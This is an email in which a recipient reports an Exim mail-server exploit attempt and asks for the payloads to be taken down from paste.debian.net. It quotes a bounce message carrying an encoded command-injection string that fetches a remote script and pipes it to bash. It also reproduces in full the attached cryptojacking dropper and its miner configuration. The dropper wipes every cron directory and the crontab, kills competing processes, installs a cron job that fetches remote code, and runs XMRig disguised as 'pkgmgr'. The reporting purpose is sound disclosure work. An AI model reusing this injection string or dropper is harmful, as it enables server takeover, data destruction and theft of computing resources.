To whom this may concern,
I got a system message from my mailer daemon lately. It contains
-------------------------------- cut --------------------------------
Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.
The following address(es) have yet to be delivered:
${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbash\x22}}@ianm-mang.math.kit.edu:
Too many "Received" headers - suspected mail loop
-------------------------------- cut --------------------------------
When you look into this you will find the URL
https://paste.debian.net/downloadh/b8e3188e
which is downloaded via wget (called by /bin/sh) and then piped to a
bash. I have attached the file. Also I have attached another file which
will be downloaded within the file above
(https://paste.debian.net/downloadh/a6621e02). The file pkgmgr.sh that
should be downloaded as well was not downloadble for me so far.
I don't know if this messages reaches the right persons, but someone may
forward it. You may at least remove the files which are accessible on
paste.debian.net.
Best
Christian
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true
},
"cpu": {
"enabled": true,
"huge-pages": true,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 1, 3],
"astrobwt": [0, 2, 1, 3],
"cn": [
[1, 0],
[1, 1]
],
"cn-heavy": [
[1, 0]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 1],
[1, 3]
],
"cn-pico": [
[2, 0],
[2, 2],
[2, 1],
[2, 3]
],
"rx": [0, 1],
"rx/wow": [0, 2, 1, 3],
"cn/0": false,
"cn-lite/0": false,
"kawpow": false,
"rx/arq": "rx/wow",
"rx/keva": "rx/wow"
},
"donate-level": 1,
"donate-over-proxy": 1,
"log-file": null,
"pools": [
{
"algo": "rx/0",
"coin": null,
"url": "83.97.20.122:443",
"user": "sshagent",
"pass": "x",
"rig-id": null,
"nicehash": true,
"keepalive": true,
"enabled": true,
"tls": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null
}
],
"print-time": 600,
"retries": 15000,
"retry-pause": 15,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false
}#!/bin/bash
if [ ! -f /etc/pkg/pkgmgr ]; then
for i in {1..5}; do
CPU=$(ps -eo pcpu | awk 'NR!=1' | sort -k1 -r -n | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
CPU=$(echo $CPU | sed 's/\.[^[:blank:]]*//')
CmdName=$(ps -eo pcpu,cmd | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
PID=$(ps -eo pcpu,pid | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
Time=$(ps -eo pcpu,etimes | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
if ((( 39 < $CPU )) && ((86400 < $Time))); then
rm /etc/cron.d/*
rm /etc/cron.hourly/*
rm /etc/cron.daily/*
rm /etc/cron.weekly/*
rm /etc/cron.monthly/*
> /etc/crontab
kill -9 $PID
fi
done
echo "#!/bin/bash" > /etc/cron.daily/pkgmgr.sh
echo "wget http://83.97.20.122:80/pkgmgr.sh | bash " >> /etc/cron.daily/pkgmgr.sh
chmod 744 /etc/cron.daily/pkgmgr.sh
mkdir /etc/pkg
cd /etc/pkg
wget -O config.json https://paste.debian.net/downloadh/a6621e02
wget https://github.com/xmrig/xmrig/releases/download/v6.3.3/xmrig-6.3.3-linux-static-x64.tar.gz
tar -xzf xmrig-6.3.3-linux-static-x64.tar.gz
mv xmrig-6.3.3/xmrig pkgmgr
chmod 777 pkgmgr
rm -r xmrig-6.3.3
rm xmrig-6.3.3-linux-static-x64.tar.gz
./pkgmgr >/dev/null 2>/dev/null &
fiAttachment:
smime.p7s
Description: S/MIME Cryptographic Signature